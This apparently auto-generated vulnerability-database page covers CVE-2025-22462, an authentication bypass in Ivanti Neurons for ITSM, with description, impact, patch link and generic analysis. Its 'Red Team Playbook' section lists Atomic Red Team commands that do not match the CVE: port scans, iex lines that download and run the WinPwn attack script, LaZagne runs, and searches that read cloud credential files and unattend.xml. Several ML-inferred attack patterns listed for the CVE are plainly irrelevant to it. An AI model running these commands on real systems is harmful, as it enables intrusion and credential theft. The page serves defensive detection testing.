CVE-2025-22462
Overview
This vulnerability is an authentication bypass affecting Ivanti Neurons for ITSM (on-premises). The root cause lies in improper validation of authentication tokens or session management within the on-premises ITSM component, allowing unauthorized access. Specific versions prior to 2023.4, 2024.2, and 2024.3 with the May 2025 Security Patch are impacted due to flawed access control mechanisms.
Vulnerability Description
An authentication bypass in Ivanti Neurons for ITSM (on-prem only) before 2023.4, 2024.2 and 2024.3 with the May 2025 Security Patch allows a remote unauthenticated attacker to gain administrative access to the system.
Impact
An unauthenticated remote attacker can exploit this flaw to gain full administrative access to the Ivanti Neurons for ITSM on-premises system, enabling control over system configurations, data, and user management. No user interaction or prior authentication is required, and the vulnerability is exploitable over the network. This can lead to complete compromise of the ITSM environment, including data breaches and disruption of IT service management operations. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation without privileges or user interaction.
Solution
Ivanti has released security patches addressing this authentication bypass in versions 2023.4, 2024.2, and 2024.3 of Neurons for ITSM on-premises as part of the May 2025 Security Patch. Administrators should apply these updates promptly to remediate the vulnerability. Detailed patch instructions and advisory information are available at Ivanti’s official security advisory portal: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-on-premises-only-CVE-2025-22462.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Ivanti Neurons for ITSM represents a critical flaw that allows for authentication bypass, enabling remote unauthenticated attackers to gain administrative access to the system. This flaw arises from improper validation of user credentials, which can be exploited to circumvent the authentication mechanisms intended to protect sensitive data and administrative functions. The affected versions, specifically those prior to the May 2025 Security Patch, are particularly vulnerable, as they do not incorporate the necessary security enhancements to mitigate this risk. The implications of this vulnerability are severe, as it can lead to unauthorized access to sensitive IT service management functionalities.
Attack vectors for this vulnerability are diverse and can be executed with minimal technical expertise. An attacker could leverage automated scripts or tools to probe the system for weaknesses in the authentication process. Once access is gained, the attacker can perform a range of malicious activities, including but not limited to data exfiltration, system manipulation, and the installation of malware. The ability to operate without authentication significantly lowers the barrier to entry for potential attackers, making it easier for them to exploit the system. Furthermore, the remote nature of the attack means that threat actors can operate from anywhere in the world, increasing the likelihood of exploitation.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Ivanti Neurons for ITSM to manage their IT services. Gaining administrative access could allow an attacker to alter configurations, access sensitive customer data, or disrupt service delivery, leading to operational downtime. The business risks associated with such an incident include financial losses, reputational damage, and potential legal ramifications stemming from data breaches. Organizations may also face regulatory scrutiny if sensitive data is compromised, resulting in fines or other penalties. The high CVSS score of 9.8 underscores the critical nature of this vulnerability and the urgent need for organizations to address it.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Additionally, organizations should ensure that they are running the latest version of Ivanti Neurons for ITSM, applying the necessary patches as soon as they are available. Implementing robust monitoring solutions can also aid in the detection of unusual access patterns or unauthorized changes to the system. Furthermore, organizations should consider enhancing their overall security posture by adopting principles of least privilege, ensuring that users have only the access necessary for their roles.
In conclusion, the authentication bypass vulnerability in Ivanti Neurons for ITSM poses significant risks to organizations that utilize this platform. The potential for unauthorized administrative access can lead to severe operational and reputational damage. As such, it is imperative for organizations to prioritize the implementation of security patches, conduct regular security audits, and adopt comprehensive monitoring strategies to safeguard against exploitation. By taking proactive measures, organizations can mitigate the risks associated with this vulnerability and protect their critical IT service management functions.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Neurons For Itsm | All |
cpe:2.3:a:ivanti:neurons_for_itsm:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Neurons For Itsm | 2023.4 |
cpe:2.3:a:ivanti:neurons_for_itsm:2023.4:-:*:*:*:*:*:*
|
|
|
Ivanti | Neurons For Itsm | 2024.2 |
cpe:2.3:a:ivanti:neurons_for_itsm:2024.2:-:*:*:*:*:*:*
|
|
|
Ivanti | Neurons For Itsm | 2024.3 |
cpe:2.3:a:ivanti:neurons_for_itsm:2024.3:-:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-22462 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-on-premises-only-CVE-2025-22462 |